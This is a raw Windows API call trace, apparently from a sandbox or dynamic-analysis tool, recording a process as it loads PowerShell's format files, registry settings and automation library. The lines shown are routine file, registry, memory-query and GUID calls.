	[0342.412] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ece38f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ece38f*, lpNumberOfBytesRead=0x1acdb8*=0x0, lpOverlapped=0x0) returned 1
	[0342.413] ReadFile (in: hFile=0x2d0, lpBuffer=0x2ececf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acdb8, lpOverlapped=0x0 | out: lpBuffer=0x2ececf0*, lpNumberOfBytesRead=0x1acdb8*=0x0, lpOverlapped=0x0) returned 1
	[0342.413] CloseHandle (hObject=0x2d0) returned 1
	[0342.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0342.413] SetErrorMode (uMode=0x1) returned 0x1
	[0342.413] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acd60 | out: lpFileInformation=0x1acd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0342.413] SetErrorMode (uMode=0x1) returned 0x1
	[0342.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0342.414] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ace48 | out: phkResult=0x1ace48*=0x2d0) returned 0x0
	[0342.414] RegQueryValueExW (in: hKey=0x2d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acdcc, lpData=0x0, lpcbData=0x1acdc8*=0x0 | out: lpType=0x1acdcc*=0x1, lpData=0x0, lpcbData=0x1acdc8*=0x56) returned 0x0
	[0342.414] CoTaskMemAlloc (cb=0x5a) returned 0x1b8140b0
	[0342.414] RegQueryValueExW (in: hKey=0x2d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd9c, lpData=0x1b8140b0, lpcbData=0x1acd98*=0x56 | out: lpType=0x1acd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acd98*=0x56) returned 0x0
	[0342.414] CoTaskMemFree (pv=0x1b8140b0) 
	[0342.414] RegCloseKey (hKey=0x2d0) returned 0x0
	[0342.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1aca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0342.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ac940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0342.419] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xf923e512, Data2=0xc037, Data3=0x4054, Data4=([0]=0x87, [1]=0xc6, [2]=0x78, [3]=0x61, [4]=0x3d, [5]=0x9e, [6]=0xbf, [7]=0xaa))) returned 0x0
	[0342.419] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x5cb74ca1, Data2=0xa71d, Data3=0x490f, Data4=([0]=0x95, [1]=0xc4, [2]=0x47, [3]=0x92, [4]=0x4c, [5]=0x5, [6]=0x13, [7]=0xe))) returned 0x0
	[0342.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.831] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x48865450, Data2=0x4b93, Data3=0x4cef, Data4=([0]=0x83, [1]=0xaf, [2]=0xa4, [3]=0x58, [4]=0x74, [5]=0x3d, [6]=0xfa, [7]=0x7e))) returned 0x0
	[0342.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.835] VirtualQuery (in: lpAddress=0x1ab080, lpBuffer=0x1abf40, dwLength=0x30 | out: lpBuffer=0x1abf40*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0342.836] VirtualQuery (in: lpAddress=0x1ab110, lpBuffer=0x1abfd0, dwLength=0x30 | out: lpBuffer=0x1abfd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0342.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.837] VirtualQuery (in: lpAddress=0x1ab890, lpBuffer=0x1ac750, dwLength=0x30 | out: lpBuffer=0x1ac750*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0342.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.839] VirtualQuery (in: lpAddress=0x1ab890, lpBuffer=0x1ac750, dwLength=0x30 | out: lpBuffer=0x1ac750*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0342.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.841] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xc8d2ecce, Data2=0x1487, Data3=0x48ac, Data4=([0]=0xab, [1]=0xb, [2]=0xad, [3]=0xae, [4]=0x78, [5]=0xf1, [6]=0xe, [7]=0x15))) returned 0x0
	[0342.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.844] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xfe3a12b8, Data2=0xab23, Data3=0x4766, Data4=([0]=0xaa, [1]=0x38, [2]=0x96, [3]=0x54, [4]=0xe, [5]=0x60, [6]=0x99, [7]=0xda))) returned 0x0
	[0342.845] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x6bb8a54f, Data2=0x5ae9, Data3=0x4391, Data4=([0]=0x86, [1]=0xff, [2]=0xc3, [3]=0x1e, [4]=0x4f, [5]=0x4b, [6]=0xe0, [7]=0x3))) returned 0x0
	[0342.849] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x15409d13, Data2=0xde8c, Data3=0x4d1b, Data4=([0]=0xbb, [1]=0xf, [2]=0x3a, [3]=0x2a, [4]=0x5f, [5]=0x7d, [6]=0xef, [7]=0xfc))) returned 0x0
	[0342.851] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xf166138e, Data2=0xd877, Data3=0x4af2, Data4=([0]=0xbc, [1]=0xa4, [2]=0x4e, [3]=0x5d, [4]=0xd7, [5]=0x4c, [6]=0x21, [7]=0xfe))) returned 0x0
	[0342.851] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x9fab08e7, Data2=0x9760, Data3=0x47da, Data4=([0]=0xb4, [1]=0x8e, [2]=0x59, [3]=0xc8, [4]=0xe, [5]=0x76, [6]=0x7e, [7]=0xb5))) returned 0x0
	[0342.851] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x56942741, Data2=0xff49, Data3=0x4995, Data4=([0]=0xa9, [1]=0xa8, [2]=0x73, [3]=0x72, [4]=0xf8, [5]=0xe2, [6]=0x73, [7]=0x4b))) returned 0x0
	[0342.852] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x3b39640a, Data2=0x781, Data3=0x4b3c, Data4=([0]=0x9c, [1]=0x67, [2]=0x27, [3]=0x10, [4]=0x67, [5]=0x90, [6]=0x38, [7]=0xe5))) returned 0x0
	[0342.852] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0xb8ee81f7, Data2=0x1ac1, Data3=0x4720, Data4=([0]=0x9c, [1]=0xc1, [2]=0x98, [3]=0xd6, [4]=0x16, [5]=0xa7, [6]=0x1e, [7]=0x27))) returned 0x0
	[0342.852] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x4e229eb3, Data2=0x13e5, Data3=0x4c75, Data4=([0]=0x89, [1]=0xea, [2]=0xc1, [3]=0x90, [4]=0xb5, [5]=0xc6, [6]=0xf, [7]=0x2e))) returned 0x0
	[0342.853] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x5ed836b, Data2=0x8c6b, Data3=0x4274, Data4=([0]=0x9c, [1]=0x5a, [2]=0xc, [3]=0x7c, [4]=0x88, [5]=0xf7, [6]=0x8b, [7]=0x5))) returned 0x0
	[0342.853] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x4d255d81, Data2=0xb05e, Data3=0x4b61, Data4=([0]=0xaa, [1]=0x63, [2]=0x9d, [3]=0x8e, [4]=0xfb, [5]=0xe0, [6]=0x8f, [7]=0xa8))) returned 0x0
	[0342.855] CoCreateGuid (in: pguid=0x1ad070 | out: pguid=0x1ad070*(Data1=0x45c72f47, Data2=0x4788, Data3=0x469d, Data4=([0]=0x89, [1]=0x7e, [2]=0x37, [3]=0xfb, [4]=0x7d, [5]=0x96, [6]=0x9a, [7]=0x80))) returned 0x0
